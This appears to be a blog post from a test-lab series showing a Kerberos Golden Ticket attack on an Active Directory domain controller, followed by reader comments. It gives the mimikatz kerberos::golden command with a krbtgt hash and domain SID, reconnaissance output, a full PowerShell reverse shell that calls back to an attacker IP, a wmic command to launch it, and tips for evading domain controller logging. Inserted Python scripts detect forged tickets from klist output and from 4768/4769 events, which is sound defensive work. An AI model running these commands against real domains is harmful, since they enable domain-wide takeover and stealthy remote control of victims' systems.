This is the second part of my previous post. Remember: you have the dump of the domain controller's hashes, but it is a test lab, and when you try to log in via PTH (pass the hash) it does not work... probably the domain admin password was changed...
Game over?
Not at all... we can try the "Golden Ticket" approach...
What is the Golden Ticket?
Before going ahead, a short recap of Microsoft's Kerberos architecture:
In order to access resources on a Windows AD network using the Kerberos protocol, you first have to obtain a TGT (Ticket Granting Ticket), which you then present to request tickets for the services you need (service tickets, or TGS). Both kinds of ticket are issued by the KDC service, which runs on the domain controllers. The TGT itself is encrypted with the key of the KRBTGT account, so whoever holds that key can mint TGTs that the KDC will accept.
Got it? And here comes the "Golden Ticket" attack: it lets you forge Kerberos TGTs offline to get unauthorized access, impersonating any domain user, with a ticket that is valid for 10 years (the mimikatz default) or for as long as you choose!
What do we need to create this Golden Ticket?
- the domain name
- the AD domain security identifier (SID)
- a valid username (Administrator, of course!)
- the hash of the KRBTGT account
Domain name and domain SID are not an issue; for example you can use the "enum4linux" tool on a Linux box (all you need is the IP address of the DC):
# enum4linux 10.1.3.40
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Feb 14 22:10:13 2017

==========================
|  Target Information  |
==========================
Target ........... 10.1.3.40
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

=======================================================
|  Enumerating Workgroup/Domain on 10.1.3.40  |
=======================================================
[+] Got domain/workgroup name: DUMMYCOMPANY

===============================================
|  Nbtstat Information for 10.1.3.40  |
===============================================
Looking up status of 10.1.3.40
  SERVER2012DC  -  B  Workstation Service
  DUMMYCOMPANY  -  B  Domain/Workgroup Name
  DUMMYCOMPANY  -  B  Domain Controllers
  SERVER2012DC  -  B  File Server Service
  DUMMYCOMPANY  -  B  Domain Master Browser
  MAC Address = 08-00-27-DC-6C-54
...
...
==============================================
|  Getting domain SID for 10.1.3.40  |
==============================================
Domain Name: DUMMYCOMPANY
Domain Sid: S-1-5-21-3534665177-2148510708-2241433719
[+] Host is part of a domain (not a workgroup)

=========================================
|  OS information on 10.1.3.40  |
=========================================
[+] Got OS info for 10.1.3.40 from smbclient: Domain=[DUMMYCOMPANY] OS=[Windows Server 2012 R2 Datacenter 9600] Server=[Windows Server 2012 R2 Datacenter 6.3]
You will get many "Access Denied" messages because you are connecting as an anonymous user, but all the necessary information will be delivered to you 😉
To get the FQDN of the domain, just do a reverse (PTR) lookup with nslookup against the DNS server hosted on the DC:
# nslookup
> server 10.1.3.40
Default server: 10.1.3.40
Address: 10.1.3.40#53
> set q=ptr
> 10.1.3.40
Server:         10.1.3.40
Address:        10.1.3.40#53

40.3.1.10.in-addr.arpa  name = server2012dc.dummycompany.local
Got it? Great! And now the last one, the KRBTGT hash. But first of all, what is this account?
“The KRBTGT account is a local default account that acts as a service account for the Key Distribution Center (KDC) service. This account cannot be deleted, and the account name cannot be changed. The KRBTGT account cannot be enabled in Active Directory.”
And yes, we have the password hashes of the KRBTGT account in our dump, remember?
The only problem we could face is that in the meantime the "krbtgt" password has been changed, but given the impact of that operation on the entire domain this is probably not the case. Admins change this password only when a security issue occurs (such as evidence of a "Golden Ticket" 😉). Note also that the KDC accepts tickets encrypted with either the current or the previous krbtgt key, so a single reset does not invalidate a golden ticket: the password has to be reset twice, with enough time between the two resets for replication to complete.
In brief, we have the following info:
- Domain name: DUMMYCOMPANY (FQDN dummycompany.local)
- User name: Administrator
- SID: S-1-5-21-3534665177-2148510708-2241433719
- KRBTGT hash: 3003567af268a4a94e26f410e84353f1
Creating “Golden Tickets”
Time has come to put into practice all we discussed above. First of all, fire up your Windows box with "mimikatz" installed!
On your Windows (virtual or physical) machine, log on with local admin rights, open an elevated command prompt and launch "mimikatz.exe":
mimikatz # kerberos::golden /admin:Administrator /domain:DUMMYDOMAIN.LOCAL /sid:S-1-5-21-3534665177-2148510708-2241433719 /krbtgt:3003567af268a4a94e26f410e84353f1 /ticket:admin.krb /ptt
User      : Administrator
Domain    : DUMMYDOMAIN.LOCAL (DUMMYDOMAIN)
SID       : S-1-5-21-3534665177-2148510708-2241433719
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 3003567af268a4a94e26f410e84353f1 - rc4_hmac_nt
Lifetime  : 2/14/2017 11:08:35 PM ; 2/12/2027 11:08:35 PM ; 2/12/2027 11:08:35 PM
-> Ticket : admin.krb

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !
So we told mimikatz to generate a "golden ticket" for user Administrator on DUMMYDOMAIN.LOCAL with all the necessary parameters and to write it to a file for later use. The "Groups Id" line shows the group membership mimikatz puts in the ticket's PAC by default: RID 513 (Domain Users) as the primary group, plus 512 (Domain Admins), 520 (Group Policy Creator Owners), 518 (Schema Admins) and 519 (Enterprise Admins). The last option, /ptt, tells mimikatz to load the newly created ticket directly into memory, ready for "Pass the Ticket" operations.
Now we can exit mimikatz and list the tickets from our command shell:
C:\Users\Administrator>klist

Current LogonId is 0:0x219fd

Cached Tickets: (1)

#0>     Client: Administrator @ DUMMYDOMAIN.LOCAL
        Server: krbtgt/DUMMYDOMAIN.LOCAL @ DUMMYDOMAIN.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 2/15/2017 7:14:56 (local)
        End Time:   2/13/2027 7:14:56 (local)
        Renew Time: 2/13/2027 7:14:56 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:
Great! Finally we have our "Golden Ticket", and look at the lifetime: 10 years!! Two things in that output are worth noting from the defender's side: a TGT that lives far beyond the default domain policy (10 hours, renewable for 7 days), and an empty "Kdc Called" field, because the ticket was injected into the cache and never issued by a KDC.
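As an added example (not part of the original post, and not a mimikatz feature), here is a small Python checker that parses klist output like the one above and flags the indicators a forged TGT leaves on the host: a lifetime beyond the default policy maximum (10 hours, renewable 7 days, assumed here), an RC4-HMAC ticket in a domain that is assumed to issue AES tickets, and an empty "Kdc Called" field. The sample input embeds the post's ticket plus a constructed, normal-looking one (the user jdoe, its AES encryption type and its timestamps are made up for comparison).

```python
import re
from datetime import datetime, timedelta

# Assumption: the domain uses the default Kerberos policy
# (max ticket lifetime 10 hours, max renewal lifetime 7 days).
MAX_TICKET_LIFETIME = timedelta(hours=10)
MAX_RENEW_LIFETIME = timedelta(days=7)
# Assumption: the domain issues AES tickets, so an RC4 (or DES) TGT is suspicious;
# mimikatz builds golden tickets with the RC4 key unless /aes256 is given.
WEAK_ETYPES = ("RC4-HMAC", "DES-CBC")

# Constructed sample: ticket #0 is the one shown in the post; ticket #1 is a
# made-up, normal-looking TGT (user jdoe, AES, 10h/7d lifetime) for comparison.
SAMPLE_KLIST = """\
Current LogonId is 0:0x219fd

Cached Tickets: (2)

#0>     Client: Administrator @ DUMMYDOMAIN.LOCAL
        Server: krbtgt/DUMMYDOMAIN.LOCAL @ DUMMYDOMAIN.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 2/15/2017 7:14:56 (local)
        End Time:   2/13/2027 7:14:56 (local)
        Renew Time: 2/13/2027 7:14:56 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

#1>     Client: jdoe @ DUMMYDOMAIN.LOCAL
        Server: krbtgt/DUMMYDOMAIN.LOCAL @ DUMMYDOMAIN.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 2/15/2017 7:10:00 (local)
        End Time:   2/15/2017 17:10:00 (local)
        Renew Time: 2/22/2017 7:10:00 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: server2012dc.dummydomain.local
"""


def _parse_time(value):
    """'2/15/2017 7:14:56 (local)' -> datetime (klist prints local time)."""
    return datetime.strptime(value.replace("(local)", "").strip(), "%m/%d/%Y %H:%M:%S")


def parse_klist(text):
    """Return one dict per cached ticket, keyed by the klist field names."""
    tickets = []
    # each ticket starts with '#<n>>'; the first chunk is the LogonId header
    for chunk in re.split(r"^#\d+>", text, flags=re.M)[1:]:
        fields = {}
        for line in chunk.splitlines():
            if ":" not in line:
                continue  # e.g. the 'Ticket Flags 0x... -> ...' line has no colon
            key, value = line.split(":", 1)  # times contain colons, split once
            fields[key.strip()] = value.strip()
        tickets.append(fields)
    return tickets


def golden_ticket_indicators(ticket):
    """Heuristic checks on one parsed ticket; returns the indicators that fired."""
    findings = []
    start = _parse_time(ticket["Start Time"])
    end = _parse_time(ticket["End Time"])
    renew = _parse_time(ticket["Renew Time"])
    if end - start > MAX_TICKET_LIFETIME:
        findings.append("lifetime %s exceeds policy maximum" % (end - start))
    if renew - start > MAX_RENEW_LIFETIME:
        findings.append("renewable lifetime %s exceeds policy maximum" % (renew - start))
    etype = ticket.get("KerbTicket Encryption Type", "")
    if any(weak in etype for weak in WEAK_ETYPES):
        findings.append("ticket encrypted with %s" % etype)
    # a TGT that was injected (pass-the-ticket) was never fetched from a KDC
    if ticket.get("Server", "").startswith("krbtgt/") and not ticket.get("Kdc Called"):
        findings.append("TGT has an empty 'Kdc Called' field (injected, not issued)")
    return findings


def scan(text):
    """Map each cached ticket's client principal to its list of indicators."""
    return {t["Client"]: golden_ticket_indicators(t) for t in parse_klist(text)}


if __name__ == "__main__":
    import subprocess
    import sys
    if sys.platform == "win32":
        text = subprocess.run(["klist"], capture_output=True, text=True).stdout
    else:
        text = SAMPLE_KLIST  # offline demo on non-Windows hosts
    for client, findings in scan(text).items():
        print(client, "->", findings or ["no indicators"])
```

On a Windows host the script reads the live cache with klist; elsewhere it runs over the embedded sample. The lifetime check alone would already catch the ticket above, since a legitimately issued TGT cannot outlive the policy maximum.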
Does it work? Fingers crossed again; let's try to list the contents of the C: drive of the domain controller. But first, map the server's name in your hosts file or point your DNS directly at the Domain Controller, it's up to you! If you address the resource by IP, Windows cannot build a Kerberos service principal name for it, so it falls back to NTLM authentication and all you will get is "ACCESS DENIED".
C:\Users\Administrator>dir \\server2012dc.dummydomain.local\c$
 Volume in drive \\server2012dc.dummydomain.local\c$ has no label.
 Volume Serial Number is A2D7-CEAD

 Directory of \\server2012dc.dummydomain.local\c$

08/22/2013  07:52 AM    <DIR>          PerfLogs
08/22/2013  06:50 AM    <DIR>          Program Files
01/13/2017  10:35 PM    <DIR>          Program Files (x86)
01/27/2017  03:57 AM    <DIR>          temp
01/27/2017  02:43 AM    <DIR>          test
01/27/2017  01:37 AM    <DIR>          Users
...
Awesome! We listed the contents of the C: drive of the domain controller "server2012dc": we have Domain Admin privileges!!
Now let's go further. Having access to the filesystem (local or shared) with admin privileges is a great result, but we want more... what about a shell to interact with the domain controller? That would be the big deal... is it possible? Yes, of course!
But it's not that easy: how can we get a remote shell while authenticating with a Kerberos ticket?
What do we need to accomplish this?
And here comes into play the fantastic built-in Microsoft tool "wmic.exe".
This tool is a command line front-end to WMI (Windows Management Instrumentation) and, guess what? It can spawn processes on remote computers while authenticating via Kerberos!
We will copy this reverse-shell script to the domain controller (assuming your IP is 10.1.2.40):
c:\users\administrator>type rev.ps1
$client = New-Object System.Net.Sockets.TCPClient('10.1.2.40',8080);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};
$client.Close()

c:\users\administrator>copy rev.ps1 \\server2012dc.dummycompany.local\c$\windows\temp
After that, we can launch the PowerShell script through wmic (remember to start "nc -lp 8080" on your Linux box first!). The /authority switch forces Kerberos and names the target's principal, so there is no NTLM fallback:
wmic /authority:"kerberos:DUMMYDOMAIN\SERVER2012DC" /node:server2012dc process call create "powershell -f c:\windows\temp\rev.ps1"
Fingers crossed again... and take a look at our terminal:
connect to [10.1.2.40] from server2012dc.dummydomain.local [10.1.3.40] 62471
PS C:\Windows\system32>
PS C:\Windows\system32>
PS C:\Windows\system32> whoami
dummycompany\administrator
We did it, great job!
That's all. 🙂
Just a couple of points to clarify:
1) If you don't forge the service tickets too (rpcss, host, cifs), Windows will request them from the KDC for you, using the golden TGT. It works, but each request leaves a service-ticket request (event 4769) in the domain controller's security log if Kerberos auditing is on, and we want to be as stealthy as possible 😉
2) You can also use psexec to get a remote shell (it works with Kerberos auth), but that creates the PSEXESVC service on the remote machine for the whole duration of the shell. Again, we want to be stealthy 😉
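Point 1 is exactly what a defender can look for on the domain controller. As an added example (not from the post), the following Python snippet runs the classic correlation over constructed 4768/4769 events: a service ticket request (4769) for an account/host pair to which no TGT was issued (4768) within the TGT lifetime. The events, the dict field names (modelled on TargetUserName, ServiceName and IpAddress of the real events), the 10-hour window and the 10.1.3.55 client are my assumptions; in a real deployment you would feed it the Security logs of every DC, since a TGT issued by one DC is legitimately used against another.

```python
from datetime import datetime, timedelta

# Assumption: default domain policy, so a legitimately issued TGT is at most
# 10 hours old when it is used to request a service ticket (a renewal shows
# up as a fresh 4768 and extends the window).
TGT_MAX_LIFETIME = timedelta(hours=10)

# Constructed sample events (not real logs). "id" is the Security event ID,
# "user" is TargetUserName, "service" is ServiceName, "ip" is IpAddress.
SAMPLE_EVENTS = [
    # a normal logon from 10.1.3.55: a TGT is issued, then used for a service ticket
    {"time": "2017-02-15 07:05:00", "id": 4768, "user": "jdoe",
     "ip": "::ffff:10.1.3.55"},
    {"time": "2017-02-15 07:06:10", "id": 4769, "user": "jdoe@DUMMYDOMAIN.LOCAL",
     "service": "SERVER2012DC$", "ip": "::ffff:10.1.3.55"},
    # the golden-ticket host 10.1.2.40: service tickets are requested for
    # Administrator, but no DC ever issued a TGT to that account from that host
    {"time": "2017-02-15 07:15:30", "id": 4769, "user": "Administrator@DUMMYDOMAIN.LOCAL",
     "service": "SERVER2012DC$", "ip": "::ffff:10.1.2.40"},
    {"time": "2017-02-15 07:15:31", "id": 4769, "user": "Administrator@DUMMYDOMAIN.LOCAL",
     "service": "SERVER2012DC$", "ip": "::ffff:10.1.2.40"},
]


def _key(event):
    """Normalise (account, client IP): 4768 logs 'user', 4769 logs 'user@REALM',
    and IPv4 clients appear as IPv4-mapped addresses ('::ffff:a.b.c.d')."""
    account = event["user"].split("@")[0].lower()
    ip = event["ip"].replace("::ffff:", "")
    return account, ip


def _ts(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")


def detect_forged_tgt_use(events):
    """Return [(event, reason)] for every 4769 with no matching 4768 in the window."""
    issued = {}      # (account, ip) -> times at which a TGT was issued
    findings = []
    for ev in sorted(events, key=_ts):
        now = _ts(ev)
        if ev["id"] == 4768:
            issued.setdefault(_key(ev), []).append(now)
            continue
        if ev["id"] != 4769:
            continue
        recent = [t for t in issued.get(_key(ev), [])
                  if now - TGT_MAX_LIFETIME <= t <= now]
        if not recent:
            account, ip = _key(ev)
            findings.append((ev, "service ticket for %s requested by %s from %s, "
                                 "but no TGT was issued to that account from that host "
                                 "in the last %s" % (ev["service"], account, ip,
                                                      TGT_MAX_LIFETIME)))
    return findings


if __name__ == "__main__":
    for ev, reason in detect_forged_tgt_use(SAMPLE_EVENTS):
        print(ev["time"], reason)
```

The jdoe pair produces nothing because its 4769 is preceded by a 4768 from the same host; both Administrator requests from 10.1.2.40 are flagged. Forging the service tickets offline as well (point 1) removes the 4769 events, which is why the post recommends it.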
How come you are using 3003567af268a4a94e26f410e84353f1 for the generation of the 2 silver tickets?
And is this number just the krbtgt hash with f1 appended? mimikatz outputs it in the golden ticket generation as ServiceKey?
I understand that for silver tickets you need the service/computer account of the destination server.
So in this case, for the TGS, you will need the server2012dc computer account hash?
Otherwise, in this case both will be treated as invalid, 2 TGS will be requested using the TGT, and the KDC will be contacted (so it will not be completely stealthy).
Probably you made some confusion.. Golden tickets have nothing to do with silver ones.. In this case (golden ticket), once you have one of the krbtgt account hashes you can generate a ticket with admin privs
I don't agree. You can't generate a TGS (/service:rpcss and /service:host) with the krbtgt hash. You need to use the target service/computer account.
I mean, you can, but both will be invalid.
It will still work anyway because you have a valid TGT (the golden one), and with that the KDC will be contacted and 2 valid TGS will be generated (but not the 2 created offline)
Ok got it, thx. Thought you were talking about the first part. Yes indeed, I made a wrong copy-paste from my commands. It should be /rc4:. Removed this part in order to avoid confusion ;-).